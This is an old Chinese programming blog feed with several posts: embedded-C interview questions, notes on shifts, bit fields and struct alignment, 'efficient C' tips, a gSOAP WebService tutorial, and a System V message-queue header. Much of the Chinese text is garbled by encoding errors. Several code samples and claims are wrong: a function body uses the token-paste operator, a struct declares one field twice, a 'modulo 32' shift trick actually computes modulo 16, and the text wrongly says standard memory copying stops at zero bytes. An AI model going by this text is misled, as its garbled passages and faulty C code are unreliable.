1)ISR 不能�q�回一个倹{��如果你不懂�q�个�Q�那么你不会被雇用的�?br />2) ISR 不能传递参数。如果你没有看到�q�一点，你被雇用的机会等同第一��V�?br />3) 在许多的处理�?�~�译器中�Q��Q点一般都是不可重入的。有些处理器/�~�译器需要让额处的寄存器入栈�Q�有些处理器/�~�译器就是不允许在ISR中做��点�q�算。此外，ISR应该是短而有效率的，在ISR中做��点�q�算是不明智的�?br />4) 与第三点一脉相承，printf()�l�常有重入和性能上的问题。如果你丢掉了第三和�W�四点，我不会太为难你的。不用说�Q�如果你能得到后两点�Q�那么你的被雇用前景��来��光明了�?br />
代码例子�Q�Code examples�Q?br />12 . 下面的代码输出是什么，��Z��么？
void foo(void)
{
unsigned int a = 6;
int b = -20;
(a+b > 6) ? puts("> 6") : puts("<= 6");
}
�q�个问题��试你是否懂得C语言中的整数自动转换原则�Q�我发现有些开发者懂得极��这些东�ѝ��不��如何，�q�无�W�号整型问题的答案是输出�?">6"。原因是当表辑ּ�中存在有�W�号�c�d��和无�W�号�c�d��时所有的操作数都自动转换为无�W�号�c�d��。因�?20变成了一个非常大的正整数�Q�所以该表达式计��出的结果大�?。这一点对于应当频�J�用到无�W�号数据�c�d��的嵌入式�pȝ��来说是丰帔R��要的。如果你�{�错了这个问题，你也��到了得不到�q�䆾工作的边�~��?br />
13. 评�h下面的代码片断：
unsigned int zero = 0;
unsigned int compzero = 0xFFFF;
/*1's complement of zero */
对于一个int型不�?6位的处理器�ؓ��_��上面的代码是不正��的。应�~�写如下�Q?br />unsigned int compzero = ~0;
�q�一问题真正能揭露出应试者是否懂得处理器字长的重要性。在我的�l�验里，好的嵌入式程序员非常准确地明白硬件的�l�节和它的局限，然而PC机程序往往把硬件作��Z��个无法避免的烦恼�?br />��C��q�个阶段�Q�应试者或者完全垂头��气了或者信心满满志在必得。如果显然应试者不是很好，那么�q�个��试��在�q�里�l�束了。但如果昄��应试者做得不错，那么我就扔出下面的追加问题，�q�些问题是比较难的，我想仅仅非常优秀的应试者能做得不错。提��些问题，我希望更多看到应试者应付问题的�Ҏ��Q�而不是答案。不��如何，你就当是�q�个�׃��?..

动态内存分配（Dynamic memory allocation�Q?
14.
��管不像非嵌入式计算机那么常见，嵌入式系�l�还是有从堆�Q�heap�Q�中动态分配内存的�q�程的。那么嵌入式�pȝ��中，动态分配内存可能发生的问题是什么？�q�里�Q�我期望应试者能提到内存��片�Q�碎片收集的问题�Q�变量的持行旉��{�等。这个主题已�l�在ESP杂志中被�q�泛地讨��了（主要�?P.J. Plauger, 他的解释�q�远��过我这里能提到的�Q何解释）�Q�所有回�q�头看一下这些杂志吧�Q�让应试者进入一�U�虚假的安全感觉后，我拿��么一个小节目�Q�下面的代码片段的输出是什么，��Z��么？
char *ptr;
if ((ptr = (char *)malloc(0)) == NULL)
puts("Got a null pointer");
else
puts("Got a valid pointer");
�q�是一个有��的问题。最�q�在我的一个同事不�l�意�?��g��l�了函数malloc�Q�得��C��一个合法的指针之后�Q�我才想到这个问题。这��是上面的代码，该代码的输出�?Got a valid pointer"。我用这个来开始讨��L��一问题�Q�看看被面试者是否想到库例程�q�样做是正确。得到正��的�{�案固然重要�Q�但解决问题的方法和你做军_��的基本原理更重要些�?br />
Typedef
15 Typedef
在C语言中频�J�用以声明一个已�l�存在的数据�c�d��的同义字。也可以用预处理器做�c�M��的事。例如，思考一下下面的例子�Q?br />#define dPS struct s *
typedef struct s * tPS;
以上两种情况的意��N��是要定义dPS �?tPS 作�ؓ一个指向结构s指针。哪�U�方法更好呢�Q�（如果有的话）��Z��么？
�q�是一个非常微妙的问题�Q��Q何�h�{�对�q�个问题�Q�正当的原因�Q�是应当被恭喜的。答案是�Q�typedef更好。思考下面的例子�Q?br />dPS p1,p2;
tPS p3,p4;
�W�一个扩展�ؓ
struct s * p1, p2;
上面的代码定义p1��Z��个指向结构的指，p2��Z��个实际的�l�构�Q�这也许不是你想要的。第二个例子正确地定义了p3 和p4 两个指针�?br />
晦�ӆ的语�?br />16 . C语言同意一些��o人震惊的�l�构,下面的结构是合法的吗�Q�如果是它做些什么？
int a = 5, b = 7, c;
c = a+++b;
�q�个问题��做��个测验的一个愉快的�l�尾。不��你�怸��怿��Q�上面的例子是完全合乎语法的。问题是�~�译器如何处理它�Q�水�q�不高的�~�译作者实际上会争��个问题，�Ҏ��最处理原则�Q�编译器应当能处理尽可能所有合法的用法。因此，上面的代码被处理成：c = a++ + b;
因此, �q�段代码持行后a = 6, b = 7, c = 12�?br />如果你知道答案，或猜出正��答案，做得好。如果你不知道答案，我也不把�q�个当作问题。我发现�q�个问题的最大好处是�q�是一个关于代码编写风��|��代码的可��L��，代码的可修改性的好的话题�?br />

井泉 2006-07-24 15:43 发表评论

井泉 — Mon, 17 Jul 2006 00:54:00 GMT

概述
　　C语言的内存模型基本上对应了现在von Neumann�Q�冯·��Z��|��计算机的实际存储模型�Q?/font>很好的达��C��Ҏ��器的映射�Q�这是C/C++适合做底层开发的主要原因�Q�另外，C语言适合做底层开发还有另外一个原因，那就是C语言对底层操作做了很多的的支持，提供了很多比较底层的功能�?/font>
　　下面�l�合问题分别�q�行阐述�?/font>
　　问题�Q�移位操�?/font>
　　在运用移位操作符�Ӟ��有两个问题必��要清楚�Q?/font>
　　(1)、在右移操作中，腄��位是�?0 �q�是�W�号位；
　　(2)、什么数可以作移位的位数�?/font>
�{�案与分析：
　　">>"�?<<"是指��变量中的每一位向��x��向左�U�d��, 光��常形式�?/font> :
　　右移: 变量�?gt;>�U�M��的位�?/font>
　　左移: 变量�?lt;<�U�M��的位�?/font>
　　�l�过�U�M��? 一端的位被"挤掉",而另一端空出的位以0 填补,在C语言中的�U�M��不是循环�U�d��的�?/font>
　　(1) �W�一个问题的�{�案很简单，但要�Ҏ��不同的情况而定。如果被�U�M��的是无符��h��Q�则�?0 。如果是有符��h��Q�那么可能填 0 或符号位。如果你惌��军_��U�L��作中腄��位的填充问题�Q�就把变量声明�ؓ无符号型�Q�这栯��I�Z��会被�|?0�?

　　(2) �W�二个问题的�{�案也很��单：如果�U�d�� n 位，那么�U�M��的位数要不小�?0 �Q��ƈ且一定要��于 n 。这样就不会在一�ơ操作中把所有数据都�U�走�?

　　比如�Q�如果整型数据占 32 位，n 是一整型数据�Q�则 n << 31 �?n << 0 都合法，�?n << 32 �?n << -1 都不合法�?

　　注意即��腄��位填�W�号位，有符��h��数的右移也不相当与除以。�ؓ了证明这一点，我们可以想一�?-1 >> 1 不可能�ؓ 0 �?

　　问题�Q�位�D늻��?

struct RPR_ATD_TLV_HEADER
{
ULONG res1:6;
ULONG type:10;
ULONG res1:6;
ULONG length:10;
};

　　位段�l�构是一�U�特�D�的�l�构, 在需按位讉K��一个字节或字的多个位时, 位结构比按位�q�算�W�更加方�ѝ�?

　　位结构定义的一般�Ş式�ؓ:

struct 位结构名 {
　数据�c�d�� 变量�? 整型常数 ;
　数据�c�d�� 变量�? 整型常数 ;
} 位结构变�?

　　其中: 整型常数必须是非负的整数, 范围�?~15, 表示二进制位的个�? 卌��C�有多少位�?

　　变量名是选择��? 可以不命�? �q�样规定是�ؓ了排列需要�?

　　例如: 下面定义了一个位�l�构�?

struct{
　unsigned incon: 8; /*incon占用低字节的0~7�?�?/font> */
　unsigned txcolor: 4;/*txcolor占用高字节的0~3位共4�?/font> */
　unsigned bgcolor: 3;/*bgcolor占用高字节的4~6位共3�?/font> */
　unsigned blink: 1; /*blink占用高字节的�W?�?/font> */
}ch;

　　位结构成员的讉K��与结构成员的讉K��相同�?

　　例如: 讉K��上例位结构中的bgcolor成员可写�?

ch.bgcolor

　　位结构成员可以与其它�l�构成员一起��用。按位访问与讄��Q�方�?amp;节省

　　例如:

struct info{
　 char name[8];
　 int age;
　 struct addr address;
　 float pay;
　 unsigned state: 1;
　 unsigned pay: 1;
}workers;'

　　上例的结构定义了关于一个工从的信息。其中有两个位结构成�? 每个位结构成员只有一�? 因此只占一个字节但保存了两个信�? 该字节中�W�一位表�C�工人的状�? �W�二位表�C�工资是否已发放。由此可见��用位�l�构可以节省存贮�I�间�?

　　注意不要��过值限�?

　　问题�Q�字节对�?

　　我在使用VC�~�程的过�E�中�Q�有一�ơ调用DLL中定义的�l�构�Ӟ��发觉�l�构都�ؕ掉了�Q�完全不能读取正��的��|��后来发现�q�是因�ؓDLL和调用程序��用的字节寚w��选项不同�Q�那么我想问一下，字节寚w��I�竟是怎么一回事�Q?

　　�{�案与分析：

　　关于字节寚w��Q?

　　1�?当不同的�l�构使用不同的字节对齐定义时�Q�可能导致它们之间交互变得很困难�?

　　2�?在跨CPU�q�行通信�Ӟ��可以使用字节寚w��来保证唯一性，诸如通讯协议、写驱动�E�序时候寄存器的结构等�?

　　三种寚w��方式�Q?

　　1�?自然寚w��方式�Q�Natural Alignment�Q�：与该数据�c�d��的大��相�{��?

　　2�?指定寚w��方式 �Q?

#pragma pack(8) // 指定Align�?8�Q?/font>
#pragma pack() // 恢复到原先�?

　　3�?实际寚w��方式�Q?

Actual Align = min ( Order Align, Natual Align )

　　对于复杂数据�c�d��Q�比如结构等�Q�：实际寚w��方式是其成员最大的实际寚w��方式�Q?

Actual Align = max( Actual align1,2,3�Q��?

　　�~�译器的填充规律�Q?

　　1�?成员为成员Actual Align的整数倍，在前面加Padding�?

　　成员Actual Align = min( �l�构Actual Align�Q�设定对齐方�?

　　2�?�l�构为结构Actual Align的整数倍，在后面加Padding.

　　例子分析�Q?

#pragma pack(8) // 指定Align�?/font> 8
struct STest1
{
char ch1;
long lo1;
char ch2;
} test1;
#pragma pack()

　　现在

Align of STest1 = 4 , sizeof STest1 = 12 ( 4 * 3 )

　　test1在内存中的排列如下（ FF �?padding �Q�：

00 -- -- -- 04 -- -- -- 08 -- -- -- 12 -- -- --
01 FF FF FF 01 01 01 01 01 FF FF FF
ch1 -- lo1 -- ch2
#pragma pack(2) // 指定Align�?/font> 2
struct STest2
{
char ch3;
STest1 test;
} test2;
#pragma pack()

　　现在 Align of STest1 = 2, Align of STest2 = 2 , sizeof STest2 = 14 ( 7 * 2 )

　　test2在内存中的排列如下：

00 -- -- -- 04 -- -- -- 08 -- -- -- 12 -- -- --
02 FF 01 FF FF FF 01 01 01 01 01 FF FF FF
ch3 ch1 -- lo1 -- ch2

　　注意事项�Q?

　　1�?�q�样一来，�~�译器无法�ؓ特定�q�_��做优化，如果效率非常重要�Q�就��量不要使用#pragma pack�Q�如果必��M��用，也最好仅在需要的地方�q�行讄��?

　　2�?需要加pack的地方一定要在定义结构的头文件中加，不要依赖命��o行选项�Q�因为如果很多�h使用该头文�g�Q��ƈ不是每个人都知道应该pack。这特别表现在�ؓ别�h开发库文�g�Ӟ��如果一个库函数使用了struct作�ؓ其参敎ͼ�当调用者与库文件开发者��用不同的pack�Ӟ��׃��造成错误�Q�而且该类错误很不好查�?

　　3�?在VC及BC提供的头文�g中，除了能正好对齐在四字节上的结构外�Q�都加了pack�Q�否则我们编的Windows�E�序哪一个也不会正常�q�行�?

　　4�?�?#pragma pack(n) 后一定不要include其他头文�Ӟ��若包含的头文件中改变了align��|��生非预期�l�果�?

　　5�?不要多�h同时定义一个数据结构。这样可以保证一致的pack倹{�?

　　问题�Q�按位运��符

　　C语言和其它高�U�语�a�不同的是它完全支持按位运��符。这与汇�~�语�a�的位操作有些�怼��?C中按位运��符列出如下:

━━━━━━━━━━━━━━━━━━━━━━━━━━━━
操作�W?作用
────────────────────────────
& 位逻辑�?/font>
| 位逻辑�?/font>
^ 位逻辑异或
- 位逻辑�?/font>
>> 右移
<< 左移
━━━━━━━━━━━━━━━━━━━━━━━━━━━━

　　注意�Q?

　　1�?按位�q�算是对字节或字中的实际位进行检��、设�|�或�U�M��, 它只适用于字�W�型和整数型变量以及它们的变�? 对其它数据类型不适用�?

　　2�?关系�q�算和逻辑�q�算表达式的�l�果只能�?�?�?而按位运��的�l�果可以�?�?以外的倹{��要注意区别按位�q�算�W�和逻辑�q�算�W�的不同, 例如, 若x=7, 则x&&8 的��gؓ�?两个非零值相与仍为非�?, 而x&8的��gؓ0�?

　　3�?| �?||�Q?amp;�?amp;&�Q�~�? 的关�p?

　　&、| �?~ 操作�W�把它们的操作数当作一个�ؓ序列�Q�按位单独进行操作。比如：10 & 12 = 8�Q�这是因�?&"操作�W�把 10 �?12 当作二进制描�q?1010 �?1100 �Q�所以只有当两个操作数的相同位同时�ؓ 1 �Ӟ��产生的结果中相应位才�?1 。同理，10 | 12 = 14 ( 1110 )�Q�通过补码�q�算�Q�~10 = -11 ( 11...110101 )�?lt;以多��ؓ一个位序列> &&、|| 和！操作�W�把它们的操作数当作"�?�?�?�Q��ƈ且用 0 代表"�?�Q��Q何非 0 ��D��认�ؓ�?�?。它们返�?1 代表"�?�Q? 代表"�?�Q�对�?&&"�?||"操作�W�，如果左侧的操作数的值就可以军_��表达式的��|��它们�Ҏ��׃��去计��右侧的操作数。所以，!10 �?0 �Q�因�?10 �?0 �Q?0 && 12 �?1 �Q�因�?10 �?12 均非 0 �Q?0 || 12也是 1 �Q�因�?10 �?0 。�ƈ且，在最后一个表辑ּ�中，12 �Ҏ��没被计��，在表辑ּ� 10 || f( ) 中也是如此�?

井泉 2006-07-17 08:54 发表评论

井泉 — Tue, 27 Jun 2006 01:42:00 GMT
�~�写高效��z�的C语言代码�Q�是许多软�g工程师追求的目标。本文就工作中的一些体会和�l�验做相关的阐述�Q�不对的地方请各位指教�?br />
�W?招：以空间换旉��

　　计算机程序中最大的矛盾是空间和旉��的矛盾，那么�Q�从�q�个角度出发逆向思维来考虑�E�序的效率问题，我们��有了解决问题的�W?招——以�I�间换时间�?br />例如�Q�字�W�串的赋倹{�?br />�Ҏ��A�Q�通常的办法：
#define LEN 32
char string1 [LEN];
memset (string1,0,LEN);
strcpy (string1,“This is a example!!”）;
�Ҏ��B�Q?br />const char string2[LEN] =“This is a example!�?
char * cp;
cp = string2 ;
(使用的时候可以直接用指针来操作�?

　　从上面的例子可以看出�Q�A和B的效率是不能比的。在同样的存储空间下�Q�B直接使用指针��可以操作了�Q�而A需要调用两个字�W�函数才能完成。B的缺点在于灵�z�L��没有A好。在需要频�J�更改一个字�W�串内容的时候，A��h��更好的灵�z�L��；如果采用�Ҏ��B�Q�则需要预存许多字�W�串�Q�虽然占用了大量的内存，但是获得了程序执行的高效率�?br />
　　如果�pȝ��的实时性要求很高，内存�q�有一些，那我推荐你��用该招数�?br />
　　该招数的变招——��用宏函数而不是函数。�D例如下：
�Ҏ��C�Q?br />#define bwMCDR2_ADDRESS 4
#define bsMCDR2_ADDRESS 17
int BIT_MASK(int __bf)
{
return ((1U << (bw ## __bf)) - 1) << (bs ## __bf);
}
void SET_BITS(int __dst, int __bf, int __val)
{
__dst = ((__dst) & ~(BIT_MASK(__bf))) | \
(((__val) << (bs ## __bf)) & (BIT_MASK(__bf))))
}

SET_BITS(MCDR2, MCDR2_ADDRESS, RegisterNumber);
�Ҏ��D�Q?br />#define bwMCDR2_ADDRESS 4
#define bsMCDR2_ADDRESS 17
#define bmMCDR2_ADDRESS BIT_MASK(MCDR2_ADDRESS)
#define BIT_MASK(__bf) (((1U << (bw ## __bf)) - 1) << (bs ## __bf))
#define SET_BITS(__dst, __bf, __val) \
((__dst) = ((__dst) & ~(BIT_MASK(__bf))) | \
(((__val) << (bs ## __bf)) & (BIT_MASK(__bf))))

SET_BITS(MCDR2, MCDR2_ADDRESS, RegisterNumber);

　　函数和宏函数的区别就在于�Q�宏函数占用了大量的�I�间�Q�而函数占用了旉��。大家要知道的是�Q�函数调用是要��用系�l�的栈来保存数据的，如果�~�译器里有栈��查选项�Q�一般在函数的头会嵌入一些汇�~�语句对当前栈进行检查；同时�Q�CPU也要在函数调用时保存和恢复当前的现场�Q�进行压栈和�Ҏ��操作�Q�所以，函数调用需要一些CPU旉��。而宏函数不存在这个问题。宏函数仅仅作�ؓ预先写好的代码嵌入到当前�E�序�Q�不会��生函数调用，所以仅仅是占用了空��_��在频�J�调用同一个宏函数的时候，该现象尤其突出�?br />
　　D�Ҏ��是我看到的最好的�|�位操作函数�Q�是ARM公司源码的一部分�Q�在短短的三行内实现了很多功能，几乎�늛�了所有的位操作功能。C�Ҏ��是其变体�Q�其中滋呌��需大家仔细体会�?br />
�W?招：数学�Ҏ��解决问题

　　现在我们演绎高效C语言�~�写的第二招——采用数学方法来解决问题�?br />
　　数学是计��机之母�Q�没有数学的依据和基��Q�就没有计算机的发展�Q�所以在�~�写�E�序的时候，采用一些数学方法会对程序的执行效率有数量��的提高�?br />举例如下�Q�求 1~100的和�?br />�Ҏ��E
int I , j;
for (I = 1 ;I<=100; I ++�Q�{
j += I;
}
�Ҏ��F
int I;
I = (100 * (1+100)) / 2

　　�q�个例子是我印象最��q��一个数学用例，是我的计��机启蒙老师考我的。当时我只有��学三年�U�，可惜我当时不知道用公�?N×�Q�N+1�Q? 2 来解册��个问题。方法E循环�?00�ơ才解决问题�Q�也��是说最��用�?00个赋��|��100个判断，200个加法（I和j�Q�；而方法F仅仅用了1个加法，1�ơ乘法，1�ơ除法。效果自然不�a�而喻。所以，现在我在�~�程序的时候，更多的是动脑�{�找规律�Q�最大限度地发挥数学的威力来提高�E�序�q�行的效率�?br />
�W?招：使用位操�?br />
　　实现高效的C语言�~�写的第三招——��用位操作�Q�减��除法和取模的运��?br />
　　在计��机�E�序中，数据的位是可以操作的最��数据单位，理论上可以用“位�q�算”来完成所有的�q�算和操作。一般的位操作是用来控制��g的，或者做数据变换使用�Q�但是，灉|��的位操作可以有效地提高程序运行的效率。�D例如下：
�Ҏ��G
int I,J;
I = 257 /8;
J = 456 % 32;
�Ҏ��H
int I,J;
I = 257 >>3;
J = 456 - (456 >> 4 << 4);

　　在字面上好像H比G�ȝ��了好多，但是�Q�仔�l�查看��生的汇编代码��׃��明白�Q�方法G调用了基本的取模函数和除法函敎ͼ�既有函数调用�Q�还有很多汇�~�代码和寄存器参与运��；而方法H则仅仅是几句相关的汇�~�，代码更简�z�，效率更高。当�Ӟ��׃��~�译器的不同�Q�可能效率的差距不大�Q�但是，以我目前遇到的MS C ,ARM C 来看�Q�效率的差距�q�是不小。相��x��~�代码就不在�q�里列�D了�?br />�q�用�q�招需要注意的是，因�ؓCPU的不同而��生的问题。比如说�Q�在PC上用�q�招�~�写的程序，�q�在PC上调试通过�Q�在�U�L��C��?6位机�q�_��上的时候，可能会��生代码隐患。所以只有在一定技术进阶的基础下才可以使用�q�招�?br />
�W?招：汇编嵌入

　　高效C语言�~�程的必杀技�Q�第四招——嵌入汇�~��?br />
　　“在熟悉汇编语言的�h眼里�Q�C语言�~�写的程序都是垃�䏀�。这�U�说法虽然偏�Ȁ了一些，但是却有它的道理。汇�~�语�a�是效率最高的计算��a��Q�但是，不可能靠着它来写一个操作系�l�吧?所以，��Z��获得�E�序的高效率�Q�我们只好采用变通的�Ҏ�� ——嵌入汇�~�，混合�~�程�?br />
　　举例如下�Q�将数组一赋值给数组�?要求每一字节都相�W��?br />char string1[1024],string2[1024];
�Ҏ��I
int I;
for (I =0 ;I<1024;I++)
*(string2 + I) = *(string1 + I)
�Ҏ��J
#ifdef _PC_
int I;
for (I =0 ;I<1024;I++)
*(string2 + I) = *(string1 + I);
#else
#ifdef _ARM_
__asm
{
MOV R0,string1
MOV R1,string2
MOV R2,#0
loop:
LDMIA R0!, [R3-R11]
STMIA R1!, [R3-R11]
ADD R2,R2,#8
CMP R2, #400
BNE loop
}
#endif

　　�Ҏ��I是最常见的方法，使用�?024�ơ��@环；�Ҏ��J则根据��^��C��同做了区分，在ARM�q�_��下，用嵌入汇�~�仅�?28�ơ��@环就完成了同��L��操作。这里有朋友会说�Q��ؓ什么不用标准的内存拯��函数�?�q�是因�ؓ在源数据里可能含有数据�ؓ0的字节，�q�样的话�Q�标准库函数会提前结束而不会完成我们要求的操作。这个例�E�典型应用于LCD数据的拷贝过�E�。根据不同的CPU�Q�熟�l��用相应的嵌入汇编�Q�可以大大提高程序执行的效率�?br />
　　虽然是必杀技�Q�但是如果轻易��用会付出惨重的代仗��这是因为，使用了嵌入汇�~�，侉K��制了�E�序的可�U�L��性，使程序在不同�q�_��U�L��的过�E�中�Q�卧虎藏龙，险象环生�Q�同时该招数也与��C��软�g工程的思想相违背，只有在迫不得已的情况下才可以采用。切讎ͼ�切记�?br />
　　使用C语言�q�行高效率编�E�，我的体会仅此而已。在此以本文抛砖引玉�Q�还请各位高手共同切��。希望各位能�l�出更好的方法，大家一��h��高我们的�~�程技巧�?/font>

井泉 2006-06-27 09:42 发表评论

用C实现WebService

井泉 — Tue, 27 Jun 2006 01:28:00 GMT

一�Q�系�l�环�?2
二．gSOAP的简要��用例�?2
三．囄��说明 6
四．要注意的问题 6
五．参考文�?7
六．备注 7

一�Q�系�l�环�?br />linux操作�pȝ��kernel2.4.2�Q�安装gsoap2.6到目�?usr/local/gsoap
二．gSOAP的简要��用例�?br />下面是一个简单的例子�Q�实��C��个加法运��的WebService�Q�具体功能是cli端输入num1和num2�Q�server端返回一个num1和num2相加的结果sum�?br />
1�Q?首先�Q�我们需要做的是写一个函数声明文�Ӟ��来定义接口函数ns__add�Q�文件名字�ؓadd.h�Q�内容如下：

//gsoap ns service name: add
//gsoap ns service namespace: http://mail.263.net/add.wsdl
//gsoap ns service location: http://mail.263.net
//gsoap ns service executable: add.cgi
//gsoap ns service encoding: encoded
//gsoap ns schema namespace: urn:add

int ns__add( int num1, int num2, int* sum );

2�Q?然后我们需要创建文件Makefile�Q�从而利用gsoapcpp2工具由add.h生成一�?xml文�g�?c文�g�?h文�g�Q�这些文件均��动生成，Makefile的内容如下：

GSOAP_ROOT=/usr/local/gsoap
WSNAME=add
CC=g++ -g -DWITH_NONAMESPACES
INCLUDE=-I $(GSOAP_ROOT)
SERVER_OBJS=$(WSNAME)C.o $(WSNAME)Server.o stdsoap2.o
CLIENT_OBJS=$(GSOAP_ROOT)/env/envC.o $(WSNAME)ClientLib.o stdsoap2.o
ALL_OBJS=${WSNAME}server.o $(WSNAME)C.o $(WSNAME)Server.o ${WSNAME}test.o ${WSNAME}client.o $(WSNAME)ClientLib.o

#�ȝ��目标
all:server

${WSNAME}.wsdl:${WSNAME}.h
$(GSOAP_ROOT)/soapcpp2 -p$(WSNAME) -i -n -c ${WSNAME}.h

stdsoap2.o:$(GSOAP_ROOT)/stdsoap2.c
$(CC) -c $?

#�~�译一��L��成规则的.o文�g
$(ALL_OBJS):%.o:%.c
$(CC) -c $? $(INCLUDE)

#�~�译服务器端
server:Makefile ${WSNAME}.wsdl ${WSNAME}server.o $(SERVER_OBJS)
$(CC) ${WSNAME}server.o $(SERVER_OBJS) -o ${WSNAME}server

#�~�译客户�?br />client:Makefile ${WSNAME}.wsdl ${WSNAME}client.c ${WSNAME}test.c $(ALL_OBJS) stdsoap2.o
$(CC) ${WSNAME}test.o ${WSNAME}client.o $(CLIENT_OBJS) -o ${WSNAME}test

cl:
rm -f *.o *.xml *.a *.wsdl *.nsmap $(WSNAME)H.h $(WSNAME)C.c $(WSNAME)Server.c $(WSNAME)Client.c $(WSNAME)Stub.* $(WSNAME)$(WSNAME)Proxy.* $(WSNAME)$(WSNAME)Object.* $(WSNAME)ServerLib.c $(WSNAME)ClientLib.c $(WSNAME)server ns.xsd $(WSNAME)test

3�Q�我们先来做一个server端，创徏文�gaddserver.c文�g�Q�内容如下：

#include "addH.h"
#include "add.nsmap"

int main(int argc, char **argv)
{
int m, s; /* master and slave sockets */
struct soap add_soap;
soap_init(&add_soap);
soap_set_namespaces(&add_soap, add_namespaces);
if (argc < 2)
{
printf("usage: %s \n", argv[0]);
exit(1);
}
else
{
m = soap_bind(&add_soap, NULL, atoi(argv[1]), 100);
if (m < 0)
{
soap_print_fault(&add_soap, stderr);
exit(-1);
}
fprintf(stderr, "Socket connection successful: master socket = %d\n", m);
for ( ; ; )
{
s = soap_accept(&add_soap);
if (s < 0)
{
soap_print_fault(&add_soap, stderr);
exit(-1);
}
fprintf(stderr, "Socket connection successful: slave socket = %d\n", s);
add_serve(&add_soap);//该句说明该server的服�?br />soap_end(&add_soap);
}
}
return 0;
}
//server端的实现函数与add.h中声明的函数相同�Q�但是多了一个当前的soap�q�接的参�?br />int ns__add(struct soap *add_soap, int num1, int num2, int *sum)
{
*sum = num1 + num2;
return 0;
}

4�Q�让我们的server跑�v来吧�Q?br />shell>make
shell>./addserver 8888
如果�l�端打印出“Socket connection successful: master socket = 3”，那么你的server已经在前台run��h��了，应该是值得高兴�?amp;#61514;�?br />打开IE�Q�键入http://本机IP:8888�Q�显�C�XML�Q�服务已�l�启动，�l�端打印出“Socket connection successful: slave socket = 4”，表示服务接收��C��一�ơsoap的连接�?br />
5�Q�让我们再来写个客户端（�q�个只是��soap的客��L��函数��装一下，具体的调用参见下面的addtest.c�Q�，创徏文�gaddclient.c�Q�内容如下：

#include "addStub.h"
#include "add.nsmap"
/**
* 传入参数�Q�server�Q�server的地址
* num1,num2�Q�需要相加的�?br />* 传出参数�Q�sum�Q�num1和num2相加的结�?br />* �q�回��|��0为成功，其他为失�?br />*/
int add( const char* server, int num1, int num2, int *sum )
{
struct soap add_soap;
int result = 0;
soap_init(&add_soap);
soap_set_namespaces(&add_soap, add_namespaces);

//该函数是客户端调用的主要函数�Q�后面几个参数和add.h中声明的一��P��前面多了3个参敎ͼ�函数名是接口函数名ns__add前面加上soap_call_
soap_call_ns__add( &add_soap, server, "", num1, num2, sum );
if(add_soap.error)
{
printf("soap error:%d,%s,%s\n", add_soap.error, *soap_faultcode(&add_soap), *soap_faultstring(&add_soap) );
result = add_soap.error;
}
soap_end(&add_soap);
soap_done(&add_soap);
return result;
}

6�Q�我们最�l�写一个可以运行的客户端调用程序，创徏文�gaddtest.c�Q�内容如下：

#include
#include

int add(const char* server, int num1, int num2, int *sum);

int main(int argc, char **argv)
{
int result = -1;
char* server="http://localhost:8888";
int num1 = 0;
int num2 = 0;
int sum = 0;
if( argc < 3 )
{
printf("usage: %s num1 num2 \n", argv[0]);
exit(0);
}

num1 = atoi(argv[1]);
num2 = atoi(argv[2]);

result = add(server, num1, num2, &sum);
if (result != 0)
{
printf("soap err,errcode = %d\n", result);
}
else
{
printf("%d+%d=%d\n", num1, num2, sum );
}
return 0;
}

7�Q�让我们的client端和server端通讯
shell>make client
shell>./addtest 7 8
当然�Q�你的server应该�q�在run�Q�这样得到输出结�?+8=15�Q�好了，你成功完成了你的�W�一个C写的WebService�Q�恭喜�?br />三．囄��说明

四．要注意的问题
1�Q?add.h文�g前面的几句注释不能删除，为soapcpp2需要识别的标志
2�Q?接口函数的返回值只能是int�Q�是soap调用的结果，一般通过soap.error来判断soap的连接情况，�q�个�q�回值没有用到�?br />3�Q?接口函数的最后一个参��Cؓ传出参数�Q�如果需要传出多个参敎ͼ�需要自己定义一个结构将�q�回��封装�?br />4�Q?�?h文�g中不能include别的.h文�g�Q�可能不能生效，需要用到某些结构的时候需要在该文件中直接声明�?br />5�Q?如果客户端的调用不需要返回��|��那么最后一个参�?br />五．参考文�?br />1�Q�gsoap主页
http://gsoap2.sourceforge.net

2�Q�跟我一起写Makefile
http://dev.csdn.net/develop/article/20/20025.shtm

3�Q�Web Services�Q?A Technical Introduction�Q�机械工业出版社�Q?br />六．备注
192.168.18.233�?92.168.18.234�?usr/local/gsoap目录下的3个需要的文�g及一个env目录�Q�不是编译安装的�Q�是在别的地方编译好了直接copy�q�来的（实际�~�译�l�果中还有wsdl2h工具及其他一些文�Ӟ��但是我们的实际开发中只是用到了这3个文件及env目录�Q�。因为时间仓促，本�h�q�没有时间研�I�编译的问题�Q�相关细节可以查看参考文�?�?br />�?92.168.18.233�?home/weiqiong/soap/sample目录下及192.168.18.234�?tmp/soap/sample目录下有本文讲到的加法运��的例子�?/font>

全文�l�束

井泉 2006-06-27 09:28 发表评论

system V消息机制

井泉 — Tue, 27 Jun 2006 01:23:00 GMT

#ifndef MSG_H
#define MSG_H
//msgid
#define LISTEN_THREAD  7
#define CENTER_THREAD  0
#define SEND_THREAD   2
#define REV_THREAD   3
#define TIME_THREAD   4
//lp
#define EXIT    0
#define SEND_SGIP_SUBMIT 1
#define SEND_SGIP_BIND
#define SEND_SGIP_R
#define SEND_SGIP_UNBIND
#define SEND_SGIP_UNBIND_R
#define REV_SGIP_SOCKET
//wp
#define SEND_SUCCESS
#define PACK_FAIL
#define SEND_FAIL
enum mgnt_cmd_type
{
event_login         = 0,
  event_logout,
  event_sip_init_para,
  event_log_init_para,
  event_sip_clean,
  event_set_dtmf_mode,
  event_set_dhcp,
  event_set_pppoe,

  event_pstn_call_out,
  event_sip_call_out,
  event_answer_sipcall,
  event_release_sipcall,
  event_loadBMP_init,


  event_pstn_call_in=20,
  event_sip_call_in,
  event_remote_release_call,
  event_remote_establish_call,
  event_remote_cancelcall,
  event_login_return,
  event_remote_ignore,

  event_set_pstn_ring,
  event_set_sip_ring,
  event_set_alarm_ring,
  event_set_ring_volume

};

typedef struct msgbuf
{
long   msgtype;
unsigned long msgid;
unsigned long lp;
unsigned long wp;
}MSGBuf, *pMSGBuf;

int vvMSGSend(long thread_id, unsigned long msgid, unsigned long lp, unsigned long wp);
int vvMSGRecv(long thread_id, struct msgbuf *msg, int is_wait);

#ifndef _WINDOWS

#include
#include
#include
#include

#define MSG_FILE_NAME    "/rw/"      //"/mnt/"
#define MSG_FLAG   (IPC_CREAT | 00666)
//| IPC_EXCL

typedef struct sendMsg
{
int sd;
void *content;
}SendMsg, *pSendMsg;

#endif

#endif //MSG_H

#include "vvmsg.h"
#include

#ifndef _WINDOWS
#include
#include
#include
#include
//#include "hash.h"
extern pthread_t g_incomingthread;
//extern hash_table table;
#endif

